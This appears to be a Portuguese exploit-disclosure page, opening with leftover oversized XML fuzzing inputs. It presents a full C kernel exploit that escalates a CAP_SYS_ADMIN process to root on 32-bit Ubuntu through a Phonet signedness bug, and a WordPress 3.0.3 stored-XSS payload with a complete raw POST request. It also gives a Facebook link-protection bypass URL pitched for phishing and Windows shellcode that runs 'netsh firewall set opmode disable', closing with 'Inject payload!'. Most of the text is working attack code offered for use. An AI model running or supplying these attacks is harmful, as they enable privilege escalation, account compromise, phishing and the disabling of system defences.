 <h2 id="textfasetwo"></h2>
 <br>
 <h2 id="progressfasetwo"></h2>
 <br>
 <h2 id="textfasetwodone"></h2>
 <br>
 <h2 id="countexploitrun"></h2>
 <br>
 <h2 id="totalruntime"></h2>
 </div>

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<XML ID="xmlid1">
<Devices>
<Device>
<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA />
</Device>
</Devices>
</XML>

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<XML ID="xmlid2">
<Devices>
<Device>
<BBBB />
</Device>
</Devices>
</XML>

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<XML ID="xmlid3">
<root>
<data>
 <SmallData>
 </SmallData>
<MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong>
 value1
</MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong>
</data>
</root>
</XML>

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<XML ID="xmlid4">
<Devices>
<Device>
<bb />
</Device>
</Devices>
</XML>

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<XML ID="xmlid5">
<Devices>
<Device>
<BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB />
</Device>
</Devices>
</XML>

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<XML ID="xmlid6">
<root>
<data>
<CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC>
 value2
</CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC>
</data>
</root>
</XML>

 </body>
</html>

Full disclosure: Ubuntu r00t


Ganho de privilégios root em Ubuntu. Atenção: conforme o cabeçalho do código, o exploit parte de um processo que já possui a capability CAP_SYS_ADMIN — não é uma escalada a partir de um usuário comum sem privilégios.

Kernel: versão 2.6.34 ou superior, somente x86 de 32 bits; requer o protocolo Phonet compilado e os símbolos necessários visíveis em /proc/kallsyms (veja as ressalvas no cabeçalho do código).


/*
 * Linux Kernel CAP_SYS_ADMIN to root exploit
 * by Dan Rosenberg
 * @djrbliss on twitter
 *
 * Usage:
 * gcc -w caps-to-root.c -o caps-to-root
 * sudo setcap cap_sys_admin+ep caps-to-root
 * ./caps-to-root
 *
 * This exploit is NOT stable:
 *
 *  * It only works on 32-bit x86 machines
 *
 *  * It only works on >= 2.6.34 kernels (it could probably be ported back, but
 *    it involves winning a race condition)
 *
 *  * It requires symbol support for symbols that aren't included by default in
 *    several distributions
 *
 *  * It requires the Phonet protocol, which may not be compiled on some
 *    distributions
 *
 *  * You may experience problems on multi-CPU systems
 *
 * It has been tested on a stock Ubuntu 10.10 installation.  I wouldn't be
 * surprised if it doesn't work on other distributions.
 *
 * ----
 *
 * Lately there's been a lot of talk about how a large subset of Linux
 * capabilities are equivalent to root.  CAP_SYS_ADMIN is a catch-all
 * capability that, among other things, allows mounting filesystems and
 * injecting commands into an administrator's shell - in other words, it
 * trivially allows you to get root.  However, I found another way to get root
 * from CAP_SYS_ADMIN...the hard way.
 *
 * This exploit leverages a signedness error in the Phonet protocol.  By
 * specifying a negative protocol index, I can craft a series of fake
 * structures in userspace and cause the incrementing of an arbitrary kernel
 * address, which I then leverage to execute arbitrary kernel code.
 *
 * Greets to spender, cloud, jono, kees, pipacs, redpig, taviso, twiz, stealth,
 * and bla.
 *
 */

#include <stdio.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <errno.h>
#include <string.h>
#include <linux/capability.h>
#include <sys/utsname.h>
#include <sys/mman.h>
#include <unistd.h>

/*
 * Kernel function pointers, filled in at runtime by main() from the
 * addresses get_kernel_sym() reads out of /proc/kallsyms. regparm(3) makes
 * calls through them pass the leading arguments in registers, which is
 * presumably how the target 32-bit kernel was built (the header restricts
 * this exploit to x86-32).
 */
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

/*
 * Credential swap, run while executing in kernel context: prepare a fresh
 * credential set from a NULL daemon template and install it on the current
 * task (the usual commit_creds(prepare_kernel_cred(0)) idiom). Both callees
 * are function pointers resolved in main(). Always returns 0.
 */
int getroot(void)
{
 unsigned long root_cred = prepare_kernel_cred(0);

 commit_creds(root_cred);
 return 0;
}

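/*
 * Code the hijacked kernel pointer lands on. The first twelve instructions
 * are a no-op "Konami code" joke (net effect on %edx: top bit cleared by the
 * shl/shr pairs); the real work is the indirect call to getroot(), which
 * installs root credentials. Only assembles for x86-32 (push/pop %ebx), as
 * the header says.
 *
 * Fix: the asm statement declared no clobbers although it writes %edx, %ebx
 * and the flags and performs a call (which by the cdecl convention may also
 * trash %eax and %ecx and touch memory). Without a clobber list the compiler
 * may keep live values in those registers across the statement. The
 * instruction sequence itself is unchanged.
 */
int konami(void)
{

 /* Konami code! */
 asm("inc %edx;"        /* UP */
 "inc %edx;"        /* UP */
 "dec %edx;"        /* DOWN */
 "dec %edx;"        /* DOWN */
 "shl %edx;"        /* LEFT */
 "shr %edx;"        /* RIGHT */
 "shl %edx;"        /* LEFT */
 "shr %edx;"        /* RIGHT */
 "push %ebx;"    /* B */
 "pop %ebx;"
 "push %eax;"    /* A */
 "pop %eax;"
 "mov $getroot, %ebx;"
 "call *%ebx;"      /* START */
 : : : "eax", "ebx", "ecx", "edx", "cc", "memory");

 return 0;
}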

/* thanks spender... */
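/*
 * Resolve kernel symbol `name` by scanning /proc/kallsyms ("addr type name"
 * lines), falling back to the older /proc/ksyms format ("addr name").
 *
 * Returns the address, or 0 when neither file can be opened or the symbol
 * is not listed. NOTE(review): on kernels that hide addresses from
 * unprivileged readers the parsed address is 0, which is indistinguishable
 * from "not found" here -- main() already treats 0 as failure.
 *
 * Fixes relative to the original: `ret` was read by the loop condition
 * before it was ever assigned (undefined behaviour); the %s conversions had
 * no field width, so an over-long symbol name would overflow sname[512];
 * two unused locals were dropped.
 */
unsigned long get_kernel_sym(char *name)
{
 FILE *f;
 unsigned long addr;
 char dummy;
 char sname[512];
 int ret = 0;
 int oldstyle = 0;

 f = fopen("/proc/kallsyms", "r");
 if (f == NULL) {
 f = fopen("/proc/ksyms", "r");
 if (f == NULL)
 return 0;
 oldstyle = 1;
 }

 while (ret != EOF) {
 if (!oldstyle)
 ret = fscanf(f, "%p %c %511s\n", (void **)&addr, &dummy, sname);
 else {
 ret = fscanf(f, "%p %511s\n", (void **)&addr, sname);
 if (ret == 2) {
 char *p;
 /* Skip the bookkeeping pseudo-entries old ksyms lists. */
 if (strstr(sname, "_O/") || strstr(sname, "_S."))
 continue;
 /* Looks like: strip a "..._Rsmp_<crc>" versioned-symbol suffix. */
 p = strrchr(sname, '_');
 if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
 p = p - 4;
 while (p > (char *)sname && *(p - 1) == '_')
 p--;
 *p = '\0';
 }
 }
 }
 if (ret == 0) {
 /* Line did not start with an address: discard a token and resync. */
 fscanf(f, "%511s\n", sname);
 continue;
 }
 if (!strcmp(name, sname)) {
 fprintf(stdout, " [+] Resolved %s to %p\n", name, (void *)addr);
 fclose(f);
 return addr;
 }
 }

 fclose(f);
 return 0;
}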

/*
 * main - driver for the Phonet proto_tab out-of-bounds exploit (x86-32).
 *
 * Flow, as visible below: open a PF_PHONET socket (fails with EPERM when
 * CAP_SYS_ADMIN is missing); resolve five kernel symbols from
 * /proc/kallsyms; build fake phonet_protocol/proto/module structures in an
 * RWX MAP_FIXED mapping at 0x20000000; use a crafted (negative) protocol
 * number so socket() indexes that mapping instead of the real proto_tab;
 * run once against a second mapping at 0x30000000 to measure the write
 * offset; then repeatedly call socket() to rewrite the top byte of the
 * pn_socket_ioctl pointer, map a page at the resulting user-space address,
 * copy konami() there, and trigger it with ioctl().  On success getuid()
 * is 0 and /bin/sh is exec'd.  Returns -1 on every failure path.
 *
 * Defender notes: the final step requires the kernel to execute code from
 * a user-space mapping, which mitigations such as SMEP are designed to
 * block; kptr_restrict hides the symbol addresses this depends on.
 * Portability notes: ptr[i] = &ptr[k] and ptr = 0x30000000 convert between
 * pointer and integer without casts (newer compilers reject this), and no
 * <sys/ioctl.h> is included for ioctl() in the visible headers.
 */
int main(int argc, char * argv[])
{

 int sock, proto, i, offset = -1;
 unsigned long proto_tab, landing, target, pn_ops, pn_ioctl, *ptr;
 void * map;

 /* Create a socket to load the module for symbol support */
 printf("[*] Testing Phonet support and CAP_SYS_ADMIN...\n");
 sock = socket(PF_PHONET, SOCK_DGRAM, 0);

 if(sock < 0) {
 if(errno == EPERM)
 printf("[*] You don't have CAP_SYS_ADMIN.\n");

 else
 printf("[*] Failed to open Phonet socket.\n");

 return -1;
 }

 /* Resolve kernel symbols */
 printf("[*] Resolving kernel symbols...\n");

 proto_tab = get_kernel_sym("proto_tab");
 pn_ops = get_kernel_sym("phonet_dgram_ops");
 pn_ioctl = get_kernel_sym("pn_socket_ioctl");
 commit_creds = get_kernel_sym("commit_creds");
 prepare_kernel_cred = get_kernel_sym("prepare_kernel_cred");

 /* Any 0 means the lookup failed (or the kernel hides addresses). */
 if(!proto_tab || !commit_creds || !prepare_kernel_cred ||
 !pn_ops || !pn_ioctl) {
 printf("[*] Failed to resolve kernel symbols.\n");
 return -1;
 }

 /* Thanks bla, for reminding me how to do basic math */
 /* Protocol number with the sign bit set; the low bits hold the
  * pointer-sized distance from proto_tab to the landing page.
  * NOTE(review): 1 << 31 overflows signed int (UB in C); 1U << 31 is the
  * well-defined spelling. */
 landing = 0x20000000;
 proto = 1 << 31 | (landing - proto_tab) >> 2;

 /* Map it */
 printf("[*] Preparing fake structures...\n");

 /* RWX fixed mapping for the fake structures (0x10000 bytes). */
 map = mmap((void *)landing, 0x10000,
 PROT_READ | PROT_WRITE | PROT_EXEC,
 MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);

 if(map == MAP_FAILED) {
 printf("[*] Failed to map landing area.\n");
 return -1;
 }

 /* Pointer to phonet_protocol struct */
 ptr = (unsigned long *)landing;
 ptr[0] = &ptr[1];

 /* phonet_protocol struct */
 for(i = 1; i < 4; i++)
 ptr[i] = &ptr[4];

 /* proto struct */
 for(i = 4; i < 204; i++)
 ptr[i] = &ptr[204];

 /* First, do a test run to calculate any offsets */
 target = 0x30000000;

 /* module struct */
 for(i = 204; i < 404; i++)
 ptr[i] = target;

 /* Map it */
 /* Scratch area (0x2000000 bytes) that the test run writes into. */
 map = mmap((void *)0x30000000, 0x2000000,
 PROT_READ | PROT_WRITE | PROT_EXEC,
 MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);

 if(map == MAP_FAILED) {
 printf("[*] Failed to map landing area.\n");
 return -1;
 }

 printf("[*] Calculating offsets...\n");

 socket(PF_PHONET, SOCK_DGRAM, proto);

 /* Scan the scratch area for the first non-zero word; its byte offset is
  * where the kernel-side write landed relative to `target`. */
 ptr = 0x30000000;
 for(i = 0; i < 0x800000; i++) {
 if(ptr[i] != 0) {
 offset = i * sizeof(void *);
 break;
 }
 }

 if(offset == -1) {
 printf("[*] Test run failed.\n");
 return -1;
 }

 /* MSB of pn_ioctl */
 target = pn_ops + 10 * sizeof(void *) - 1 - offset;

 /* Re-fill the module struct */
 ptr = (unsigned long *)landing;
 for(i = 204; i < 404; i++)
 ptr[i] = target;

 /* Push pn_ioctl fptr into userspace */
 printf("[*] Modifying function pointer...\n");

 /* Each socket() call bumps the targeted byte by one; stop once the
  * pointer's top byte reads 0x10. */
 landing = pn_ioctl;
 while((landing & 0xff000000) != 0x10000000) {
 socket(PF_PHONET, SOCK_DGRAM, proto);
 landing += 0x01000000;
 }

 /* Map it */
 /* Page-align the new pointer value and map RWX memory there. */
 map = mmap((void *)(landing & ~0xfff), 0x10000,
 PROT_READ | PROT_WRITE | PROT_EXEC,
 MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);

 if(map == MAP_FAILED) {
 printf("[*] Failed to map payload area.\n");
 return -1;
 }

 /* Copy payload */
 /* Copies 1024 bytes starting at konami's entry, regardless of its real size. */
 memcpy((void *)landing, &konami, 1024);

 printf("[*] Executing Konami code at ring0...\n");
 /* Kernel now dispatches pn_socket_ioctl through the rewritten pointer. */
 ioctl(sock, 0, NULL);

 if(getuid()) {
 printf("[*] Exploit failed to get root.\n");
 return -1;
 }

 printf("[*] Konami code worked!  Have a root shell.\n");
 /* NOTE(review): execl's return is not checked; on failure main falls off
  * the end, which yields exit status 0 in C99. */
 execl("/bin/sh", "/bin/sh", NULL);

}

WordPress 3.0.3 Stored XSS


Software: wordpress.org

Versão: 3.0.3

Browsers afetados: IE7, IE6, NS8.1

Autor: Saif

XSS na página de post usando estilo CSS

PoC: Postagem com "<IMG STYLE="xss:expression(alert('XSS'))">"

Ou você pode usar uma raw request para implantar o parâmetro com o XSS


POST /wordpress/wp-admin/post.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15)
Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer:
http://127.0.0.1/wordpress/wp-admin/post.php?post=145&action=edit&message=1
Cookie:
wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=xss%7C1293636697%7C17562b2ebe444d17730a2bbee6ceba99;
wp-settings-time-1=1293196695; wp-settings-time-2=1293197912;
wp-settings-1=m3%3Dc%26editor%3Dhtml; wp-settings-2=editor%3Dhtml%26m5%3Do;
wp-settings-time-3=1293462654; wp-settings-3=editor%3Dhtml;
wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=xss%7C1293636697%7C7437e30b3242f455911b2b60daf35e48;
PHPSESSID=a1e7d9fcce3d072b31162c4acbbf1c37;
kaibb4443=80bdb2bb6b0274393cdd1e47a67eabbd;
AEFCookies2525[aefsid]=kmxp4rfme1af9edeqlsvtfatf4rvu9aq
Content-Type: application/x-www-form-urlencoded
Content-Length: 1655

_wpnonce=aad1243dc1&_wp_http_referer=/wordpress/wp-admin/post.php?post=145&action=edit&message=1&user_ID=3&action=editpost&originalaction=editpost&post_author=3&post_type=post&original_post_status=publish&referredby=http://127.0.0.1/wordpress/wp-admin/post.php?post=145&action=edit&message=1&_wp_original_http_referer=http://127.0.0.1/wordpress/wp-admin/post.php?post=145&action=edit&message=1&post_ID=145&autosavenonce=e35a537141&meta-box-order-nonce=718e35f130&closedpostboxesnonce=0203f58029&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=12&jj=27&aa=2010&hh=15&mn=31&ss=55&hidden_mm=12&cur_mm=12&hidden_jj=27&cur_jj=27&hidden_aa=2010&cur_aa=2010&hidden_hh=15&cur_hh=16&hidden_mn=31&cur_mn=02&original_publish=Update&save=Update&post_category[]=0&post_category[]=1&tax_input[post_tag]=&newtag[post_tag]=&post_title=&samplepermalinknonce=ffcbf222eb&content=<IMG+STYLE="xss:expression(alert('XSS'))">&excerpt=&trackback_url=&meta[108][key]=_edit_last&_ajax_nonce=257f6f6ad9&meta[108][value]=3&meta[111][key]=_edit_lock&_ajax_nonce=257f6f6ad9&meta[111][value]=1293465765&meta[116][key]=_encloseme&_ajax_nonce=257f6f6ad9&meta[116][value]=1&meta[110][key]=_wp_old_slug&_ajax_nonce=257f6f6ad9&meta[110][value]=&metakeyselect=#NONE#&metakeyinput=&metavalue=&_ajax_nonce-add-meta=61de41e725&advanced_view=1&comment_status=open&ping_status=open&add_comment_nonce=c32341570f&post_name=145

Facebook Link Redirect


Servidor: http://www.facebook.com

Risco: baixo

Autor: SpecTrum_Bill

Faz um bypass no protetor de link do facebook, possibilitando algum tipo de ataque de phishing.

PoC: http://www.facebook.com/l.php?u=https://unauthorizedaccess.wordpress.com&h=5a3db

Shellcode: Killing Firewall Windows


Essa shellcode desativa o firewall do Windows.

Testado em: win32 SP2 e 3


#include <stdio.h>

/*
 * Raw x86-32 machine code followed by a NUL-terminated command string.
 * The trailing bytes (from "\x63\x6d\x64..." to "\x00") spell out the
 * "cmd.exe /c netsh firewall set opmode disable" string given in the
 * "Decoded:" section below.  In the leading bytes, each \xbb is a
 * `mov ebx, imm32` carrying an absolute address and \xff\xd3 is `call ebx`,
 * i.e. the code calls fixed addresses rather than resolving APIs.  Those
 * hard-coded addresses are why it is tied to the service-pack builds listed
 * above and why it breaks under ASLR or any other library layout.
 */
char code[] = "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c"
              "\xff\xd3\xe8\xe5\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x73"
              "\x68\x20\x66\x69\x72\x65\x77\x61\x6c\x6c\x20\x73\x65\x74\x20\x6f\x70\x6d\x6f\x64\x65\x20"
              "\x64\x69\x73\x61\x62\x6c\x65\x00";

/*
 * Test harness: casts the `code` byte array to a function pointer and jumps
 * into it.  This only works when the data section holding `code` is
 * executable; DEP/NX-enabled builds fault here instead.  The cast to (int)
 * discards the result, and there is no return statement (falling off the
 * end of main() returns 0 in C99).  argc/argv are unused.
 */
int main(int argc, char **argv)
{
    int (*func)();
    func = (int (*)()) code;
    (int)(*func)();
}

Decoded:


cmd.exe /c netsh firewall set opmode disable

Inject payload! ;*